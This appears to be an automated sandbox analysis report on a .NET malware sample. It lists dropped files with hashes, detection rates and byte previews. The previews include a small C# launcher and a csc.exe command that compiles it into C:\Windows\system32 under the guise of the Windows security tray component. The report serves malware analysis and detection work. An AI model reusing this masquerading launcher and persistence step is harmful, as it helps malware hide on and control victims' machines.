                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):383
                                                                                                                Entropy (8bit):5.0067170727830765
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L29JwPL4SiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLKm
                                                                                                                MD5:725583A6F5000085D27652E92951F0AB
                                                                                                                SHA1:DCCAB3BF4B4D475F42C81F4BFDC35CE1B5401979
                                                                                                                SHA-256:9BDCC344FFB112D8F7F11FF003F5800266EF4FA98686C3AC657D6DA1F187976B
                                                                                                                SHA-512:50C2D02AA3B334477E98FD247D7BE6846994A73960E9F1E363DB007B52AD9C452739911F5C4AA8567572409BCAFA87D13DB5318452A7D8CEB76983CF556E08AF
                                                                                                                Malicious:false
                                                                                                                Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\fozAQGvSmfTQIywuzSgk.exe"); } catch { } }).Start();. }.}.
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):253
                                                                                                                Entropy (8bit):5.02491290278636
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oN723fEC5dAWxn:Hu7L//TRq79cQnan5x
                                                                                                                MD5:91D68F214B584DA5FA865F2E9A8AE519
                                                                                                                SHA1:4181F2344C63C5D3C3D05FA9BE1B654397C22597
                                                                                                                SHA-256:D18B968C51EC172CB7729F4BD1F8B46A6918F3E15DCE6F396C03F626091C091E
                                                                                                                SHA-512:226186892CF4B36248058879CCE64A73FC8867BCB587D30F16BCD79B37E2C6AC86E98497CFF08A47EA54EE965A23F955AB0CD79A9F0A2050432179D77E8FBAED
                                                                                                                Malicious:false
                                                                                                                Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.0.cs"
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (335), with CRLF, CR line terminators
                                                                                                                Category:modified
                                                                                                                Size (bytes):756
                                                                                                                Entropy (8bit):5.22259242902613
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:KO2z/I/u7L//TRq79cQnan5UKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOuI/un/Vq79tnaniKax5DqBVKVrdFAw
                                                                                                                MD5:028964768C2912658392AC236A10460E
                                                                                                                SHA1:FF631C10C22053BD64560F7780E7AD0E091F64C4
                                                                                                                SHA-256:34B914350E84D35AF797B3498855A8DCDABCB10C4AC1E95FA502BB51E7F5ED5A
                                                                                                                SHA-512:B8EDD85556344A5EDC56CDF5299100A55092470CD974311812DA9145A1BF9743B176DCB021CB2D4EFC1B6D9BB0B84BE557E330FAE9848FC2D3B81DE169671D34
                                                                                                                Malicious:false
                                                                                                                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):182
                                                                                                                Entropy (8bit):5.6708538473130545
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:p1UgdQh0mbEn+B/lXVQbZSKcvne0FfvLtihdREHWTMqPnDRNEh7Ou2Oiul:wgd00K/ySKcvPBWEHVqPncTNl
                                                                                                                MD5:48EC5844D800C9FB05019CA09007888A
                                                                                                                SHA1:DDD51A293F83B2E716DD29B362D9DCDB8A6E2C39
                                                                                                                SHA-256:33CECCF70149959BAB039BBB70B75F28D5A11E5F6944E465F79CDA30DE18AF35
                                                                                                                SHA-512:3EA7773D197B4D789643DF7DE737110B1CB0C9307A61EBF3A2CED9190F675FB8F2B62A36AB990740D14662E20AA832B60DE2673217D248D5C436C93D21C22AB2
                                                                                                                Malicious:false
                                                                                                                Preview:3psVPqmVZP85DQNkXdyztaaxJ84uaeiu97DhSpfyjZaRKFrH7vhkwFbcP4LQv154rO5FNpRr79QU9JnEQwxo6784gkSXdPCrefj6Jm4Rd0mwyGcFRH99DQ8tQBimX4Ns6i0ejq4o2fKFULFaHMGWPDoNh0qHDR4jm4zQP8gkMVGhF2ZE6IfKy1
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):85504
                                                                                                                Entropy (8bit):5.8769270258874755
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: T0jSGXdxX5.exe, Detection: malicious
                                                                                                                • Filename: s5duotgoYD.exe, Detection: malicious
                                                                                                                • Filename: main.exe, Detection: malicious
                                                                                                                • Filename: file_1443.exe, Detection: malicious
                                                                                                                • Filename: lsass.exe, Detection: malicious
                                                                                                                • Filename: t8xf0Y1ovi.exe, Detection: malicious
                                                                                                                • Filename: QMT2731i8k.exe, Detection: malicious
                                                                                                                • Filename: TGh6AUbQkh.exe, Detection: malicious
                                                                                                                • Filename: 2VaAObAYLP.exe, Detection: malicious
                                                                                                                • Filename: dvc2TBOZTh.exe, Detection: malicious
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):9728
                                                                                                                Entropy (8bit):5.0168086460579095
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32256
                                                                                                                Entropy (8bit):5.631194486392901
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):46592
                                                                                                                Entropy (8bit):5.870612048031897
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):23552
                                                                                                                Entropy (8bit):5.519109060441589
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):69632
                                                                                                                Entropy (8bit):5.932541123129161
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                File Type:MSVC .res
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1224
                                                                                                                Entropy (8bit):4.435108676655666
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                Malicious:false
                                                                                                                Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4608
                                                                                                                Entropy (8bit):3.941006147870262
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:6JJXPtKM7Jt8Bs3FJsdcV4MKe27QBvqBHqOulajfqXSfbNtm:oPRPc+Vx9MQBvkUcjRzNt
                                                                                                                MD5:2C206799D659065E6C9853973CBE6075
                                                                                                                SHA1:2CB6368DA1C7309FE72B0D1AFF7AF1C9025E90D9
                                                                                                                SHA-256:A79E16DE2601C983291970B360D16B4C8F0CCCBE9877EEB62554541A4B9A93B5
                                                                                                                SHA-512:D9279A77EE255AEC4678238A50F42D76407EE488CF128D2B1389B1110AB0E42178F5632FF0195E2FBA771E89DA5520F8DEDBF2D3ECD27FF4220E9E2ED05ED02D
                                                                                                                Malicious:true
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with very long lines (798), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):798
                                                                                                                Entropy (8bit):5.886178447864095
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:f+VPYh548IES/LwBML7vU9rneHvYhmbR1Uh6d5DRUSx4i8a6j2ziWsxSGauR1k:yQQ8IESDDuegKR/bFTx4yGUsi
                                                                                                                MD5:8E9DB41D0A1F939603F9BA49D485E513
                                                                                                                SHA1:DF5BCD2FA3C0D6D0D3121C60D2C4E1B659A1EB0E
                                                                                                                SHA-256:1EA538C8D8A7B6C8BD5F5B9AD74AF034212DFF60043D5444721D70F6B81B9891
                                                                                                                SHA-512:0BDFDAD4933230ED1E70FF0C305E6DA32249A86B33A4E874E245F2941CF14EA1B1202BE8065D6CC740F3FF08F4D08F2EF8C7729090F42EDF160BA8F3D9E42886
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1998336
                                                                                                                Entropy (8bit):7.561504801735127
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:S1cKuEoW9iN0TvOJcaCXMgg2Suqp6Nheem6Vuuean7WiOLYGhYJG9oQpyhctpnWq:wb24KbkglgVMm9OAG9oMgctpnW5yI4
                                                                                                                MD5:2D756772BC00E5778D794C107358DDF7
                                                                                                                SHA1:77229FC9CEEB137C6644A4FA3085AECABAF94EC3
                                                                                                                SHA-256:A7F4C48301AD6B01C8777427EACEB965A9E0C14D493F44D1DEA4F8D498123469
                                                                                                                SHA-512:31FAE1A50618ED221CEF3BFC72A017E8E925C3AA2BAC727040EE655D9DFF567813E91D76FECDA0478653D50B8061481447DED77939B94E1EC823C3419B68C783
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                Malicious:false
                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                Process:C:\Windows\System32\PING.EXE
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):502
                                                                                                                Entropy (8bit):4.6129248873154785
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:PKmfl5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:RdUOAokItULVDv
                                                                                                                MD5:1962DD4D65A3076C2C1907F163BFA68D
                                                                                                                SHA1:12771D9984DFC36B7F1F13283AFCA408B72F0929
                                                                                                                SHA-256:A6DDE7150A043033EAABBC21C44DFFD6A63890B15A4F1F34BC65EACD2EB10651
                                                                                                                SHA-512:C3D19BCE6689F2D9BD48D310F4148A3B78F6E0318BD6AF437BA5F323DFEC7AA292022143254DD7848D2AE75F6100EC7791D9A15781534694CD8F7257967373AF
                                                                                                                Malicious:false
                                                                                                                Preview:..Pinging 609290 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Entropy (8bit):7.561504801735127
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                File name:LzmJLVB41K.exe
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5:2d756772bc00e5778d794c107358ddf7
                                                                                                                SHA1:77229fc9ceeb137c6644a4fa3085aecabaf94ec3
                                                                                                                SHA256:a7f4c48301ad6b01c8777427eaceb965a9e0c14d493f44d1dea4f8d498123469
                                                                                                                SHA512:31fae1a50618ed221cef3bfc72a017e8e925c3aa2bac727040ee655d9dff567813e91d76fecda0478653d50b8061481447ded77939b94e1ec823c3419b68c783
                                                                                                                SSDEEP:24576:S1cKuEoW9iN0TvOJcaCXMgg2Suqp6Nheem6Vuuean7WiOLYGhYJG9oQpyhctpnWq:wb24KbkglgVMm9OAG9oMgctpnW5yI4
                                                                                                                TLSH:7595BE1A65928F7BD2A45B318467043D82A4C7323D66FF0A361F20E1A9077B5CA735FB
                                                                                                                Icon Hash:00928e8e8686b000
                                                                                                                Entrypoint:0x5e948e
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x6733AC44 [Tue Nov 12 19:28:04 2024 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                Instruction
                                                                                                                jmp dword ptr [00402000h]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1e9440 | 0x4b | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1ea000 | 0x320 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
